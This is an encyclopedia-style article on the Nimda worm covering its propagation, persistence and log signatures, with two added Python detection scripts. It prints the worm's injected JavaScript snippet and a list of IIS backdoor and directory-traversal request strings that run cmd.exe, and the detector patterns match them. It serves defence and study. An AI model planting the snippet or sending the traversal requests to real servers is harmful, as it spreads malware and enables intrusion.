Nimda Worm

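A more destructive piece of malicious code, the Nimda worm, began spreading rapidly across the Internet. The Nimda worm infects many kinds of computer systems in the Windows family and spreads through multiple channels; its propagation speed, reach and destructive power all exceed those of Code Red II.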

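Basic information

  • Chinese name: Nimda蠕蟲病毒 (Nimda worm virus)
  • Category: a more destructive piece of malicious code
  • Characteristics: fast propagation, wide reach
  • Includes: reading SMTP addresses and email addresses from them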

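Introduction

The virus spreads by email. The message body is empty and there appears to be no attachment, but the virus's executable code is actually embedded in the message. When a user receives the mail with Outlook or Outlook Express (without Microsoft's patch installed), the virus has already executed, unnoticed, by the time the message is previewed. During normal operation (loading, opening ports, scanning for weak passwords, infecting), the virus copies itself to the temporary directory when it executes and then runs the copy in the temporary directory. The virus also creates a load.exe file in the Windows system directory and changes the shell entry in system.ini from shell=explorer.exe to explorer.exe load.exe -dontrunold, so that it is activated again the next time the system starts. In addition, it creates another copy of itself in the system directory: riched20.dll. To send itself out by mail, the virus uses MAPI functions to read the user's email and extracts SMTP addresses and email addresses from it.
The running virus also uses ShellExecute to run system commands such as NET.EXE, USER.EXE and SHARE.EXE, adds the Guest user to the Guests and Administrators groups (on NT/2000/XP) and activates the Guest account. It also shares the root of the C: drive.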

Affected systems

All Windows 95, 98, ME, NT and 2000 client and server systems

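Propagation methods

* From client to client by email
* From client to client through open network shares
* From web server to client when the client browses an infected website
* From client to web server by actively scanning for and exploiting the "Microsoft IIS 4.0 / 5.0 directory traversal" flaw
* From client to web server by scanning for the backdoors left by "Code Red" (IN-2001-09) and "sadmind/IIS" (CA-2001-11)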

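Impact

A machine infected with Nimda continually sends copies of mail carrying the Nimda virus to every address in the Windows address book.
Likewise, client machines scan for vulnerable IIS servers. Nimda looks for the backdoors left by earlier IIS worms: Code Red II [IN-2001-09] and the sadmind/IIS worm [CA-2001-11]; it also tries to exploit the IIS Directory Traversal vulnerability (VU #111677).
Preliminary analysis indicates that the virus does nothing destructive beyond altering web content directories in order to propagate itself. However, the volume of email it sends and the network scanning it performs can cause a network denial of service (DoS).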

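Analysis

An infected machine sends a copy of the Nimda code to every vulnerable server it finds while scanning. Once running on that server, the worm traverses every directory on the system (including every directory readable through file shares) and leaves a copy of itself on disk named "README.EML". When it finds a directory holding web content (containing html or asp files), the following JavaScript snippet is appended to every web-related file: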
<script language="JavaScript">window.open("readme.eml",null,
"resizable=no,top=6000,left=6000")
</script>
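This code lets the worm propagate further, infecting new clients through a web browser or through browsing files over the network.
Propagation via the browser
As part of the infection process, Nimda modifies all files containing web content (such as .htm, .html and .asp files). As a result, any user who browses such a file, whether through a browser or over the network, may download a copy of the virus. Some browsers perform the download automatically, infecting the machine that is viewing the site.
Infection via the file system
Nimda creates a large number of copies of itself, named README.EML, in every directory to which the user has write permission. If a user on another machine selects the virus file over a network share and has the preview feature enabled, the worm will threaten that new machine as well.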
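The system.ini change described in the introduction, the README.EML copies and the appended script are all artifacts an administrator can look for on disk. The following Python check is an added example, not code from the original page: the function names are hypothetical, the sample tree is constructed, and it assumes the shell= entry sits in the [boot] section of system.ini.

```python
import os
import re
import tempfile
from pathlib import Path

# Web content types the page says the worm modifies.
WEB_EXTENSIONS = {".htm", ".html", ".asp"}

# The appended script, matched byte-wise and tolerant of whitespace and line breaks.
INJECTED_RE = re.compile(
    rb'<script\s+language="JavaScript">\s*window\.open\(\s*"readme\.eml"\s*,'
    rb'\s*null\s*,\s*"resizable=no,top=6000,left=6000"\s*\)\s*</script>',
    re.IGNORECASE,
)


def suspicious_shell(system_ini_text):
    """Return the [boot] shell= value if it is anything other than explorer.exe."""
    section = None
    for raw in system_ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "boot" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "shell":
                value = value.strip()
                return None if value.lower() == "explorer.exe" else value
    return None


def strip_injected(data: bytes) -> bytes:
    """Remove the appended script from a page, leaving the rest untouched."""
    return INJECTED_RE.sub(b"", data)


def scan_tree(root):
    """Walk a directory tree and list README.EML copies and modified web pages."""
    root = Path(root)
    found = {"eml_copies": [], "injected_pages": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if name.lower() == "readme.eml":
                found["eml_copies"].append(rel)
            elif path.suffix.lower() in WEB_EXTENSIONS:
                try:
                    data = path.read_bytes()
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
                if INJECTED_RE.search(data):
                    found["injected_pages"].append(rel)
    found["eml_copies"].sort()
    found["injected_pages"].sort()
    return found


def build_sample_tree(root):
    """Constructed test data: a small web root with clean and modified files."""
    root = Path(root)
    (root / "docs").mkdir()
    snippet = (b'<script language="JavaScript">window.open("readme.eml",null,\r\n'
               b'"resizable=no,top=6000,left=6000")\r\n</script>')
    (root / "index.html").write_bytes(b"<html><body>clean</body></html>")
    (root / "default.asp").write_bytes(b"<html><body>shop</body></html>\r\n" + snippet)
    (root / "docs" / "Main.HTM").write_bytes(b"<p>docs</p>" + snippet)
    (root / "docs" / "README.EML").write_bytes(b"placeholder, not a real sample")
    (root / "notes.txt").write_bytes(snippet)  # not a web extension: ignored


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(scan_tree(tmp))
    print(suspicious_shell("[boot]\nshell=explorer.exe load.exe -dontrunold\n"))
```
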
System logs
On any web server with port 80/tcp open, Nimda's scanning generates the following log entries:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
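Note: the first four lines of this example are attempts to connect to the backdoor left by Code Red II; the remaining lines are attempts to exploit the Directory Traversal vulnerability.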
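The split described in the note can be turned into a log check that classifies each probe and groups them by client. This Python detector is an added example, not code from the original page: the function names, the common-log-format input, the sample lines (constructed, with documentation IP addresses and placeholder timestamps) and the four-probe threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in NCSA common log format. Request targets for 192.0.2.10
# come from the log excerpt above; the other clients are added for contrast.
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [01/Jan/2000:00:00:02 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [01/Jan/2000:00:00:02 +0000] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [01/Jan/2000:00:00:03 +0000] "GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [01/Jan/2000:00:00:03 +0000] "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [01/Jan/2000:00:00:04 +0000] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
198.51.100.7 - - [01/Jan/2000:00:00:05 +0000] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [01/Jan/2000:00:00:06 +0000] "GET /docs/../index.html HTTP/1.0" 200 1043
203.0.113.5 - - [01/Jan/2000:00:00:07 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 512
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)[^"]*" (\d{3}) \S+$')
TARGET_RE = re.compile(r"/(?:root|cmd)\.exe$", re.I)
# Paths that need no traversal: the backdoor locations from the first four lines.
BACKDOOR_RE = re.compile(
    r"^/(?:scripts|msadc)/root\.exe$|^/[a-z]/winnt/system32/cmd\.exe$", re.I)
# How the path separator between the ".." pairs was disguised.
ENCODINGS = {
    "percent": re.compile(r"%(?:5c|2f)", re.I),
    "nested-percent": re.compile(r"%25|%35", re.I),
    "unicode": re.compile(r"(?:\\x|%)c[01]", re.I),  # 0xC0/0xC1 lead bytes
}


def classify(target):
    """Return 'backdoor', 'traversal' or None for one request target."""
    path, _, query = target.partition("?")
    if not TARGET_RE.search(path) or not query.lower().startswith("/c+"):
        return None
    if BACKDOOR_RE.match(path):
        return "backdoor"
    if ".." in path:
        return "traversal"
    return None


def separator_encodings(target):
    """Name the separator encodings present in a traversal probe."""
    return {name for name, rx in ENCODINGS.items() if rx.search(target)}


def analyze(log_text, min_distinct=4):
    """Summarize probes per client; 'sweep' marks clients trying many variants."""
    seen = defaultdict(lambda: {"backdoor": set(), "traversal": set(),
                                "encodings": set(), "answered": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        client, target, status = m.groups()
        kind = classify(target)
        if kind is None:
            continue
        entry = seen[client]
        entry[kind].add(target)
        if kind == "traversal":
            entry["encodings"] |= separator_encodings(target)
        if status.startswith("2"):
            entry["answered"] += 1  # the server served the probe instead of rejecting it
    report = {}
    for client, e in seen.items():
        distinct = len(e["backdoor"]) + len(e["traversal"])
        report[client] = {
            "backdoor": len(e["backdoor"]),
            "traversal": len(e["traversal"]),
            "encodings": sorted(e["encodings"]),
            "answered": e["answered"],
            "sweep": distinct >= min_distinct,
        }
    return report


if __name__ == "__main__":
    for client, summary in analyze(SAMPLE_LOG).items():
        print(client, summary)
```

A non-zero "answered" count deserves attention before the sweep flag does: it means this server returned a success status to a probe rather than rejecting it.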

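Solution

All organizations must take the response to this virus very seriously, promptly organize their administrators and closely monitor the state of their networks; once this worm is detected, take remedial action quickly.
To help everyone study and respond to this type of virus, part of the virus's disassembled code is provided here: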